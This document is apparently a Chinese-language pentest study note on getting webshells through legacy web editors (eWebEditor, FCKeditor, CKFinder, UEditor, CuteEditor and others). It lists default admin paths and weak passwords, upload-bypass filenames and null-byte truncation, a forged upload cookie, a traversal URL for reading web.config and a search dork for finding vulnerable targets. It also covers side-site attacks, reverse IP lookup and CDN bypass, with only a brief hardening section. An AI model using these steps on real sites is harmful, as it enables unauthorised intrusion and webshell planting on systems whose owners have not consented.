一.本文介绍
1、本文介绍Ewebeditor常识、获取webshell、fckeditor获取webshell、旁注原理、ip逆向查询、目录越权及跨库查询、cdn绕过。
二.学习步骤
1、Ewebeditor常识:
默认后台:xxxx.com/ewebeditor/admin_login.asp
数据库地址:ewebeditor/db/ewebeditor.mdb
帐号:admin 密码:admin/admin888/admin000(各种弱口令)
常用数据库路径为:
ewebeditor/db/ewebeditor.asa
ewebeditor/db/ewebeditor.asp
ewebeditor/db/#ewebeditor.asa
ewebeditor/db/#ewebeditor.mdb
ewebeditor/db/ewebeditor.mdb
ewebeditor/db/!@#ewebeditor.asp
ewebeditor/db/ewebeditor1033.mdb 等
默认数据库下载报错。(.mdb被保护了,从这里找到.mdb删除就好了)
2、Ewebeditor后台获取webshell
1. http://IP/admin_login.asp:账号:admin 密码:admin,然后添加样式,
在图片类型中加入以下类型:asa|cer|asp|aaspsp
最后添加工具栏:插入或修改图片
2. 工具栏添加好后点击“预览”,上传在样式的图片格式中加入cer或asp等,我上传的是shell.cer,然后在代码的地方可以看到URL,然后菜刀连接即可。用低版本浏览器,高版本可能打不开.
2)目录遍历
点击"上传文件管理" 然后选择样式目录。
在id=14后面加上&dir=../,发现没有起作用,那就是2.1.6这个版本不存在这个漏洞。换成2.8.0。2.8.0存在这个文件遍历漏洞。
4. 在下载的数据库中看eWebEditor_style表中的S_ImageExt字段是否有被人添加过什么。
使用下面的语句进入突破:
ewebeditor.asp?ID=xx&style=yy 其中的id=xx就是被修改过的那条记录的id,而yy就是S_name字段的名字。
3、Ewebeditor文件上传实验
将代码新建为html:
创建完直接打开,点击上传按钮将马上传,右键查看源代码:
默认文件上传保存的路径为ewebiditor/uploadfile,访问:http://IP/uploadfile/2020417145621756.cer,输入马的密码:
4、fckeditor获取webshell
1.查看编辑器版本
FCKeditor/_whatsnew.html
2.FCKeditor编辑器页
FCKeditor/_samples/default.html
3.常用上传地址
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
2.5的版本下面这条语句能用:
http://192.168.87.129:8234//editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
若出现:
根据提示,需要:
开启文件上传功能,把\editor\filemanager\connectors\asp\config.asp文件中的
DimConfigIsEnabled
ConfigIsEnabled = False
设置成功true。
手工新建:
/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=fendo.asp
原因:
CurrentFolder:当前文件夹 未进行过滤(这个文件夹下的没有过滤)
NewFolderName:新建文件名 进行了过滤
添加敏感文件夹
敏感目录
登录即可获取shell
CKFinder编辑器:
任意文件上传漏洞
其1.4.3 asp.net版本存在任意文件上传漏洞,攻击者可以利用该漏洞上传任意文件,CKFinder在上传文件的时候,强制将文件名(不包括后缀)中点号等其他字符转为下划线_,但是在修改文件名时却没有任何限制,从而导致可以上传1_php;1.jpg等畸形文件名,最终导致文件上传漏洞
然后修改文件名
1_php;1.jpg
利用iis6.0目录解析漏洞拿shell
创建目录/x.asp/
在目录下上传图片马即可拿shell
southidceditor :南方数据编辑器
任意文件上传漏洞
首先登陆后台
利用编辑器上传
访问admin/southidceditor/admin_style.asp
修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传
UEDITOR编辑器:
利用ii6.0文件名解析漏洞
上传图片改名为:
x.php;20221.jpg获取shell
DotNetTextBox编辑器:
任意文件上传漏洞
关键字:system_dntb/
确定有system_dntb/uploadimg.aspx并能打开,这时候是不能上传的,由于他是验证cookie来得出上传后的路径,这样我们可以用cookie欺骗工具
cookie:UserType=0;IsEdition=0;Info=1;
uploadFolder=../system_dntb/Upload/;
路径可以修改,只要权限够,上传后改名为1.asp;.jpg利用iis解析漏洞
Kedit编辑器:PHPWEB网站管理系统后台
两种利用方式:
第一种是利用iis6.0文件名解析漏洞:
xx.php;xx.jpg
第二种方式:
%00截断
xx.php%00jpg
ute Editor在线编辑器:
本地包含漏洞
影响版本:
Cute Editor For Net 6.4
脆弱描述:
可以随意查看网站文件内容,危害较大
攻击利用:
http://www.xx.com/Cute_Client?CuteEditor/Load.ashx?type=image&file=../../../web.config
Cute Editor Asp.Net版:
利用iis解析漏洞获得权限
影响版本:
CuteEditor for ASP.NET中文版脆弱描述:
脆弱描述:
CuteEditor对上传文件名未重命名,导致其可利用IIS文件名解析Bug获得webshell权限。
攻击利用:
可通过在搜索引擎中键入关键字 inurl:Post.aspx?SmallClassID= 来找到测试目标。
在编辑器中点击“多媒体插入”,上传一个名为“xxx.asp;.avi”的网马,以此获得权限。
5、旁注原理
主站不存在漏洞,通过同服务器的其它站点存在的漏洞,进而获取整个服务器网站的权限,进行控制。
6、ip逆向查询
可通过ping 域名获取其相关IP地址,之后通过IP地址反查获取其旁注的域名。
相关网址:
http://tool.chinaz.com/Same/
http://dns.aizhan.com/
http://www.11best.com/ip/
目录越权:
通过一个网站的目录访问统一服务器下的其他网站的目录,一个网站被攻陷,全都被攻陷
防御方法:每个网站创建一个不同的账号
1、建立一个账号test,默认在 users 组
2、将网站的身份验证和访问控制的匿名访问更换为test
3、将IUSR删除,添加test用户,需要注意的是,尽量不要同时给读取运行和写入权限,读写分离。
4、如果要绝对的安全,可以将C盘的访问权限设置为仅管理员访问
跨库查询:是指由于权限设置不严格,导致普通帐号被授予过高的权限,从而使得其可以对其他的数据库进行操作。比如,在mysql中,informatin_schema
这个表默认只有root有权限进行操作。但是如果一个普通账户权限过高后,他便可以对该数据库进行操作,从而影响整个mysql数据库的运行。
sqlmap里面使用“—current-代表”进行判断当前库是哪个。Mysql的root、mssql的sa、oracle的sys 分别是其数据库中权限最大的账户。
8、cdn绕过
1.利用SecurityTrails平台
2. 二级域名或泛解析ping
3.nslookup
4.https://dnsdb.io/zh-cn/ ###DNS查询
https://x.threatbook.cn/ ###微步在线http://toolbar.netcraft.com/site_report?url= ###在线域名信息查询http://viewdns.info/ ###DNS、IP等查询
https://tools.ipip.net/cdn.php ###CDN查询IP